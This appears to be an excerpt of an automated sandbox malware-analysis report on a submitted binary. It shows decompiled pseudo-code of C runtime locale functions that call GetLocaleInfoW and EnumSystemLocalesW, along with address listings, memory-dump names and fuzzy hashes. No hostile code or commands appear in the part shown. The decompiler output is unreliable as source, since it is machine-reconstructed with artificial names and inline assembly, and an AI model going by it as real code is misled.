							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t41;
							if( *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
								_t30 = E00A0B1C4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
								__eflags = _t30;
								if(__eflags == 0) {
									_push(_t47);
									_push(_t30);
									goto L9;
								}
							}
						}
					} else {
						__eflags = _t41;
						if(__eflags != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							__eflags =  *_t47;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							_t31 = E00A0EB9F(__eflags);
							__eflags = _t31;
							if(_t31 != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
					__eflags =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E009F8F7D(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}



















                                                                                                                                                                          0x00a0e973
                                                                                                                                                                          0x00a0e97e
                                                                                                                                                                          0x00a0e985
                                                                                                                                                                          0x00a0e993
                                                                                                                                                                          0x00a0e99b
                                                                                                                                                                          0x00a0e9aa
                                                                                                                                                                          0x00a0e9b6
                                                                                                                                                                          0x00a0e9c7
                                                                                                                                                                          0x00a0e9cf
                                                                                                                                                                          0x00a0e9e0
                                                                                                                                                                          0x00a0e9e7
                                                                                                                                                                          0x00a0e9ea
                                                                                                                                                                          0x00a0e9ec
                                                                                                                                                                          0x00a0e9f7
                                                                                                                                                                          0x00a0e9f9
                                                                                                                                                                          0x00a0e9fb
                                                                                                                                                                          0x00a0e9fe
                                                                                                                                                                          0x00a0ea0a
                                                                                                                                                                          0x00a0ea11
                                                                                                                                                                          0x00a0ea13
                                                                                                                                                                          0x00a0ea15
                                                                                                                                                                          0x00a0ea16
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ea16
                                                                                                                                                                          0x00a0ea13
                                                                                                                                                                          0x00a0e9fe
                                                                                                                                                                          0x00a0e9ee
                                                                                                                                                                          0x00a0e9ee
                                                                                                                                                                          0x00a0e9f0
                                                                                                                                                                          0x00a0ea24
                                                                                                                                                                          0x00a0ea24
                                                                                                                                                                          0x00a0ea24
                                                                                                                                                                          0x00a0ea27
                                                                                                                                                                          0x00a0ea2a
                                                                                                                                                                          0x00a0e9f2
                                                                                                                                                                          0x00a0e9f2
                                                                                                                                                                          0x00a0e9f3
                                                                                                                                                                          0x00a0ea17
                                                                                                                                                                          0x00a0ea17
                                                                                                                                                                          0x00a0ea18
                                                                                                                                                                          0x00a0ea20
                                                                                                                                                                          0x00a0ea22
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ea22
                                                                                                                                                                          0x00a0e9f0
                                                                                                                                                                          0x00a0ea34
                                                                                                                                                                          0x00a0ea34
                                                                                                                                                                          0x00a0e9d1
                                                                                                                                                                          0x00a0e9d1
                                                                                                                                                                          0x00a0e9d3
                                                                                                                                                                          0x00a0e9d3
                                                                                                                                                                          0x00a0ea45

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04232
                                                                                                                                                                            • Part of subcall function 00A041D0: _free.LIBCMT ref: 00A04268
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A0E9C7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2003897158-0
                                                                                                                                                                          • Opcode ID: 54ae81db6475339f751972dc9a0da3a850e3bbf3dcd7a13e17c1abb7f9e857df
                                                                                                                                                                          • Instruction ID: 8cc74825b4a318ce7a6dbfb2ccb947cadfd2b4125e369421f94e7f703ba67c1f
                                                                                                                                                                          • Opcode Fuzzy Hash: 54ae81db6475339f751972dc9a0da3a850e3bbf3dcd7a13e17c1abb7f9e857df
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21B3B261020AABDB18DB28ED41ABA77A8FF48355F10417EF901D61C1EB74ED40E750
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0E5FA Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E00A0E5FA(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E00A041D0(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E00A0E6F4( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E00A0E720, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

















                                                                                                                                                                          0x00a0e607
                                                                                                                                                                          0x00a0e60d
                                                                                                                                                                          0x00a0e60e
                                                                                                                                                                          0x00a0e611
                                                                                                                                                                          0x00a0e614
                                                                                                                                                                          0x00a0e614
                                                                                                                                                                          0x00a0e617
                                                                                                                                                                          0x00a0e619
                                                                                                                                                                          0x00a0e627
                                                                                                                                                                          0x00a0e62d
                                                                                                                                                                          0x00a0e630
                                                                                                                                                                          0x00a0e633
                                                                                                                                                                          0x00a0e633
                                                                                                                                                                          0x00a0e636
                                                                                                                                                                          0x00a0e638
                                                                                                                                                                          0x00a0e641
                                                                                                                                                                          0x00a0e64c
                                                                                                                                                                          0x00a0e64f
                                                                                                                                                                          0x00a0e655
                                                                                                                                                                          0x00a0e660
                                                                                                                                                                          0x00a0e660
                                                                                                                                                                          0x00a0e669
                                                                                                                                                                          0x00a0e66c
                                                                                                                                                                          0x00a0e674
                                                                                                                                                                          0x00a0e67a
                                                                                                                                                                          0x00a0e67e
                                                                                                                                                                          0x00a0e683
                                                                                                                                                                          0x00a0e687
                                                                                                                                                                          0x00a0e68c
                                                                                                                                                                          0x00a0e68e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e68e
                                                                                                                                                                          0x00a0e694

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00A0E720,00000001,00000000,?,-00000050,?,00A0ED4E,00000000,?,?,?,00000055,?), ref: 00A0E66C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                          • Opcode ID: d3b847ca0ffac8c239ab60ecdcf6d30d0cb78bf380bf235d3c61e739f942c08d
                                                                                                                                                                          • Instruction ID: 8401f871c9c41515122cf44d10dc6b6fee1d530098d9119b7ba0e027a0d9ed86
                                                                                                                                                                          • Opcode Fuzzy Hash: d3b847ca0ffac8c239ab60ecdcf6d30d0cb78bf380bf235d3c61e739f942c08d
                                                                                                                                                                          • Instruction Fuzzy Hash: B31129362007095FDB18DF39E8915BABB91FF94358F194C2CE94647A80D7727842D740
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0EB9F Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E00A0EB9F(void* __eflags, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_t8 = E00A041D0(_t15, _t21);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E00A0E6F4( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}















                                                                                                                                                                          0x00a0eba4
                                                                                                                                                                          0x00a0eba7
                                                                                                                                                                          0x00a0ebac
                                                                                                                                                                          0x00a0ebaf
                                                                                                                                                                          0x00a0ebd3
                                                                                                                                                                          0x00a0ec07
                                                                                                                                                                          0x00a0ec07
                                                                                                                                                                          0x00a0ebd5
                                                                                                                                                                          0x00a0ebd8
                                                                                                                                                                          0x00a0ec02
                                                                                                                                                                          0x00a0ec04
                                                                                                                                                                          0x00a0ebe0
                                                                                                                                                                          0x00a0ebe0
                                                                                                                                                                          0x00a0ebe3
                                                                                                                                                                          0x00a0ebe6
                                                                                                                                                                          0x00a0ebe6
                                                                                                                                                                          0x00a0ebe9
                                                                                                                                                                          0x00a0ebec
                                                                                                                                                                          0x00a0ec00
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0ec00
                                                                                                                                                                          0x00a0ebd8
                                                                                                                                                                          0x00a0ec0c

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A0E93C,00000000,00000000,?), ref: 00A0EBCB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                          • Opcode ID: 9cebeb91927aab60d413070b682a11e72fae0a13ec6956c43b57b0a7cdf6f05a
                                                                                                                                                                          • Instruction ID: 97ee077c6bf8b50d7fdfcfcee68ae51c4a3bf7680200b7b8c1b63ba33b70f9d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 9cebeb91927aab60d413070b682a11e72fae0a13ec6956c43b57b0a7cdf6f05a
                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0F432A00119ABEB28DB25EC0EBBA7768FB40358F144829ED06A31C0EA75FD41D6D0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0E695 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0E695(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E00A041D0(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E00A0E6F4( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(E00A0E973, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}










                                                                                                                                                                          0x00a0e6a2
                                                                                                                                                                          0x00a0e6a8
                                                                                                                                                                          0x00a0e6a9
                                                                                                                                                                          0x00a0e6ac
                                                                                                                                                                          0x00a0e6af
                                                                                                                                                                          0x00a0e6af
                                                                                                                                                                          0x00a0e6b2
                                                                                                                                                                          0x00a0e6b4
                                                                                                                                                                          0x00a0e6c2
                                                                                                                                                                          0x00a0e6c5
                                                                                                                                                                          0x00a0e6c8
                                                                                                                                                                          0x00a0e6d3
                                                                                                                                                                          0x00a0e6d3
                                                                                                                                                                          0x00a0e6dc
                                                                                                                                                                          0x00a0e6df
                                                                                                                                                                          0x00a0e6e5
                                                                                                                                                                          0x00a0e6eb
                                                                                                                                                                          0x00a0e6ed
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e6ed
                                                                                                                                                                          0x00a0e6f3

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00A0E973,00000001,?,?,-00000050,?,00A0ED12,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A0E6DF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                          • Opcode ID: b788c8f8c2744e4a1df2dfddab153c8badc93b048869505ffc023c509eb276c8
                                                                                                                                                                          • Instruction ID: a0a18a87deb8d05df533c2a24bef7efa4567c951a731ed013098abd6e05902b4
                                                                                                                                                                          • Opcode Fuzzy Hash: b788c8f8c2744e4a1df2dfddab153c8badc93b048869505ffc023c509eb276c8
                                                                                                                                                                          • Instruction Fuzzy Hash: E2F0C8363043085FD7149F79F88166A7B91EB94368F05882DF945476D0D6B25C41E650
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A06017 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                          			E00A06017(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0xa21658);
				E009F93D0(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E009FE1B2( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0xa46808 = E00A00EA2( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E00A0600A, 1);
				_t17 =  *0xa44bac; // 0x96877b9b
				 *0xa46808 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E00A06087();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}






                                                                                                                                                                          0x00a06017
                                                                                                                                                                          0x00a06019
                                                                                                                                                                          0x00a0601e
                                                                                                                                                                          0x00a06023
                                                                                                                                                                          0x00a0602c
                                                                                                                                                                          0x00a06032
                                                                                                                                                                          0x00a06043
                                                                                                                                                                          0x00a06055
                                                                                                                                                                          0x00a06057
                                                                                                                                                                          0x00a0605c
                                                                                                                                                                          0x00a06061
                                                                                                                                                                          0x00a06064
                                                                                                                                                                          0x00a0606b
                                                                                                                                                                          0x00a06075
                                                                                                                                                                          0x00a06081

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 009FE1B2: EnterCriticalSection.KERNEL32(-00A4623F,?,00A00CF0,00000000,00A21478,0000000C,00A00CB7,?,?,00A04455,?,?,00A04372,00000001,00000364,00000002), ref: 009FE1C1
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00A0600A,00000001,00A21658,0000000C,00A06435,00000000), ref: 00A0604F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                          • Opcode ID: 70d50619ae21440d4e523d3c1f9fb6e17a3d727dc246bf4c2ba5fce0f45202c8
                                                                                                                                                                          • Instruction ID: ba6f98d0461220d00041cb081bf31fbc9eda37a039888c6995147e1501fcc3bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 70d50619ae21440d4e523d3c1f9fb6e17a3d727dc246bf4c2ba5fce0f45202c8
                                                                                                                                                                          • Instruction Fuzzy Hash: E7F04F7AA40208EFDB00DF9CE842B9D77F0EB89724F10842AF500972E1C7B55941CF40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0E5AF Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0E5AF(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E00A041D0(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0xa0e508, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}









                                                                                                                                                                          0x00a0e5bb
                                                                                                                                                                          0x00a0e5bf
                                                                                                                                                                          0x00a0e5c2
                                                                                                                                                                          0x00a0e5c5
                                                                                                                                                                          0x00a0e5c5
                                                                                                                                                                          0x00a0e5c8
                                                                                                                                                                          0x00a0e5cb
                                                                                                                                                                          0x00a0e5e3
                                                                                                                                                                          0x00a0e5e6
                                                                                                                                                                          0x00a0e5ec
                                                                                                                                                                          0x00a0e5f2
                                                                                                                                                                          0x00a0e5f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e5f4
                                                                                                                                                                          0x00a0e5f9

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00A0E508,00000001,?,?,?,00A0ED70,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A0E5E6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                          • Opcode ID: 7f3def0da4fab04a346da988891af2ba20b99ff8b634a58d89e3885bad023ee0
                                                                                                                                                                          • Instruction ID: 6012081ece1cfd7ad1ba1f1b27cd6f775f6fadf065f53ec1a3099b1cbccb354d
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3def0da4fab04a346da988891af2ba20b99ff8b634a58d89e3885bad023ee0
                                                                                                                                                                          • Instruction Fuzzy Hash: A9F055363002085BCB08DF79EC05A6ABF90EFC5718F064858EE058B280E671E842D790
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A06539 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00A02B84,?,20001004,00000000,00000002,?,?,00A02191), ref: 00A0656D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 54a7f2cc697ed31a64d3aacb4727262bb3e186d9eacd56e57d6a9a6578e284f3
                                                                                                                                                                          • Instruction ID: 32bb5032d8a9b39e5466d64316071779e9aac63f672d631f53dc805b70e79dff
                                                                                                                                                                          • Opcode Fuzzy Hash: 54a7f2cc697ed31a64d3aacb4727262bb3e186d9eacd56e57d6a9a6578e284f3
                                                                                                                                                                          • Instruction Fuzzy Hash: A0E04F3250022CBBCF126FA1FC04ADE3E26EF48764F048011FD05662A1CB369E31AA95
